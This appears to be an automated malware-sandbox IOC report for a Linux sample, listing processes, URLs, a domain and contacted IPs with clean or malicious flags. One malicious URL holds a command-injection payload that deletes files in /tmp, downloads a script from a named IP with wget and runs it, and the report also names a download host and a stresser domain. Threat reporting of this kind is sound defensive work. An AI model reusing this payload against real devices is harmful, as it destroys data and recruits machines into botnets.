IOC Report

loading gif

Processes

Path
Cmdline
Malicious
/tmp/9o6Z1wEokT
/tmp/9o6Z1wEokT
clean
/tmp/9o6Z1wEokT
n/a
clean
/tmp/9o6Z1wEokT
n/a
clean
/tmp/9o6Z1wEokT
n/a
clean
/tmp/9o6Z1wEokT
n/a
clean
/tmp/9o6Z1wEokT
n/a
clean
/tmp/9o6Z1wEokT
n/a
clean
/tmp/9o6Z1wEokT
n/a
clean
/usr/bin/xfce4-panel
n/a
clean
/usr/lib/x86_64-linux-gnu/xfce4/panel/wrapper-2.0
/usr/lib/x86_64-linux-gnu/xfce4/panel/wrapper-2.0 /usr/lib/x86_64-linux-gnu/xfce4/panel/plugins/libsystray.so 6 12582920 systray "Notification Area" "Area where notification icons appear"
clean
/usr/bin/xfce4-panel
n/a
clean
/usr/lib/x86_64-linux-gnu/xfce4/panel/wrapper-2.0
/usr/lib/x86_64-linux-gnu/xfce4/panel/wrapper-2.0 /usr/lib/x86_64-linux-gnu/xfce4/panel/plugins/libstatusnotifier.so 7 12582921 statusnotifier "Status Notifier Plugin" "Provides a panel area for status notifier items (application indicators)"
clean
/usr/bin/xfce4-panel
n/a
clean
/usr/lib/x86_64-linux-gnu/xfce4/panel/wrapper-2.0
/usr/lib/x86_64-linux-gnu/xfce4/panel/wrapper-2.0 /usr/lib/x86_64-linux-gnu/xfce4/panel/plugins/libpulseaudio-plugin.so 8 12582922 pulseaudio "PulseAudio Plugin" "Adjust the audio volume of the PulseAudio sound system"
clean
/usr/bin/xfce4-panel
n/a
clean
/usr/lib/x86_64-linux-gnu/xfce4/panel/wrapper-2.0
/usr/lib/x86_64-linux-gnu/xfce4/panel/wrapper-2.0 /usr/lib/x86_64-linux-gnu/xfce4/panel/plugins/libxfce4powermanager.so 9 12582923 power-manager-plugin "Power Manager Plugin" "Display the battery levels of your devices and control the brightness of your display"
clean
/usr/lib/x86_64-linux-gnu/xfce4/panel/wrapper-2.0
n/a
clean
/usr/sbin/xfpm-power-backlight-helper
/usr/sbin/xfpm-power-backlight-helper --get-max-brightness
clean
/usr/bin/xfce4-panel
n/a
clean
/usr/lib/x86_64-linux-gnu/xfce4/panel/wrapper-2.0
/usr/lib/x86_64-linux-gnu/xfce4/panel/wrapper-2.0 /usr/lib/x86_64-linux-gnu/xfce4/panel/plugins/libnotification-plugin.so 10 12582924 notification-plugin "Notification Plugin" "Notification plugin for the Xfce panel"
clean
/usr/bin/xfce4-panel
n/a
clean
/usr/lib/x86_64-linux-gnu/xfce4/panel/wrapper-2.0
/usr/lib/x86_64-linux-gnu/xfce4/panel/wrapper-2.0 /usr/lib/x86_64-linux-gnu/xfce4/panel/plugins/libactions.so 14 12582925 actions "Action Buttons" "Log out, lock or other system actions"
clean
/usr/bin/dbus-daemon
n/a
clean
/usr/lib/x86_64-linux-gnu/xfce4/xfconf/xfconfd
/usr/lib/x86_64-linux-gnu/xfce4/xfconf/xfconfd
clean
/usr/lib/systemd/systemd
n/a
clean
/usr/lib/x86_64-linux-gnu/xfce4/notifyd/xfce4-notifyd
/usr/lib/x86_64-linux-gnu/xfce4/notifyd/xfce4-notifyd
clean
There are 16 hidden processes, click here to show them.

URLs

Name
IP
Malicious
http://127.0.0.1:80/shell?cd+/tmp;rm+-rf+*;wget+49.12.233.52/jaws;sh+/tmp/jaws
138.68.131.225
malicious
http://upx.sf.net
unknown
clean
http://49.12.233.52/bin
unknown
clean
http://schemas.xmlsoap.org/soap/encoding/
unknown
clean
http://schemas.xmlsoap.org/soap/envelope/
unknown
clean

Domains

Name
IP
Malicious
scamanje.stresserit.pro
49.12.233.52
clean

IPs

IP
Domain
Country
Malicious
155.138.246.9
unknown
United States
malicious
12.207.216.252
unknown
United States
clean
178.18.96.250
unknown
Russian Federation
clean
51.37.119.129
unknown
Ireland
clean
202.161.141.133
unknown
Hong Kong
clean
222.226.32.46
unknown
Japan
clean
74.52.27.51
unknown
United States
clean
41.145.154.94
unknown
South Africa
clean
223.148.2.244
unknown
China
clean
116.90.107.205
unknown
Pakistan
clean
139.22.3.99
unknown
Germany
clean
131.163.248.60
unknown
Canada
clean
117.115.137.146
unknown
China
clean
204.79.203.53
unknown
United States
clean
164.41.71.61
unknown
Brazil
clean
205.176.15.147
unknown
United States
clean
183.206.97.10
unknown
China
clean
210.60.42.108
unknown
Taiwan; Republic of China (ROC)
clean
197.136.224.39
unknown
Kenya
clean
71.167.226.28
unknown
United States
clean
41.51.170.27
unknown
South Africa
clean
78.209.96.98
unknown
France
clean
115.178.4.124
unknown
Hong Kong
clean
148.29.157.23
unknown
United States
clean
141.93.110.68
unknown
Netherlands
clean
104.119.90.59
unknown
United States
clean
82.60.20.181
unknown
Italy
clean
41.190.129.207
unknown
Mauritius
clean
156.38.69.244
unknown
Togo
clean
197.90.74.62
unknown
South Africa
clean
210.33.92.35
unknown
China
clean
156.49.195.231
unknown
Sweden
clean
156.57.94.245
unknown
Canada
clean
175.184.26.171
unknown
Japan
clean
197.12.117.158
unknown
Tunisia
clean
213.246.160.119
unknown
United Kingdom
clean
156.235.189.126
unknown
Seychelles
clean
197.237.248.144
unknown
Kenya
clean
210.25.254.104
unknown
China
clean
218.85.108.163
unknown
China
clean
98.163.92.7
unknown
United States
clean
144.79.42.106
unknown
unknown
clean
18.138.65.36
unknown
United States
clean
52.172.168.232
unknown
United States
clean
161.31.175.172
unknown
United States
clean
2.6.97.90
unknown
France
clean
197.190.12.213
unknown
Ghana
clean
74.250.40.167
unknown
United States
clean
94.7.176.226
unknown
United Kingdom
clean
60.94.29.130
unknown
Japan
clean
180.246.6.3
unknown
Indonesia
clean
118.144.105.159
unknown
China
clean
208.196.44.13
unknown
United States
clean
199.91.86.20
unknown
Canada
clean
109.183.48.98
unknown
Czech Republic
clean
123.114.215.96
unknown
China
clean
41.127.73.195
unknown
South Africa
clean
40.28.77.69
unknown
United States
clean
178.60.215.125
unknown
Spain
clean
42.253.2.46
unknown
China
clean
156.11.35.24
unknown
Canada
clean
41.35.35.154
unknown
Egypt
clean
41.76.191.251
unknown
Kenya
clean
197.47.108.232
unknown
Egypt
clean
202.97.163.205
unknown
China
clean
41.102.150.114
unknown
Algeria
clean
120.186.107.194
unknown
Indonesia
clean
69.186.67.178
unknown
United States
clean
156.121.7.93
unknown
United States
clean
115.126.52.106
unknown
Hong Kong
clean
174.67.133.238
unknown
United States
clean
41.61.164.252
unknown
South Africa
clean
37.98.140.246
unknown
Finland
clean
152.113.180.106
unknown
United States
clean
42.204.186.204
unknown
China
clean
42.4.251.174
unknown
China
clean
109.7.133.227
unknown
France
clean
123.145.54.222
unknown
China
clean
112.180.205.190
unknown
Korea Republic of
clean
47.105.148.45
unknown
China
clean
38.162.241.85
unknown
United States
clean
96.104.187.63
unknown
United States
clean
5.142.43.27
unknown
Russian Federation
clean
156.240.70.1
unknown
Seychelles
clean
158.163.60.230
unknown
Canada
clean
206.112.107.64
unknown
United States
clean
168.2.58.209
unknown
United States
clean
182.235.102.243
unknown
Taiwan; Republic of China (ROC)
clean
197.50.174.117
unknown
Egypt
clean
160.12.51.133
unknown
Japan
clean
150.94.128.87
unknown
Japan
clean
79.101.206.56
unknown
Serbia
clean
210.232.162.151
unknown
Japan
clean
37.129.242.246
unknown
Iran (ISLAMIC Republic Of)
clean
52.35.26.205
unknown
United States
clean
57.171.197.28
unknown
Belgium
clean
84.184.1.125
unknown
Germany
clean
148.94.50.51
unknown
United States
clean
31.241.9.128
unknown
Germany
clean
5.107.178.204
unknown
United Arab Emirates
clean
There are 90 hidden IPs, click here to show them.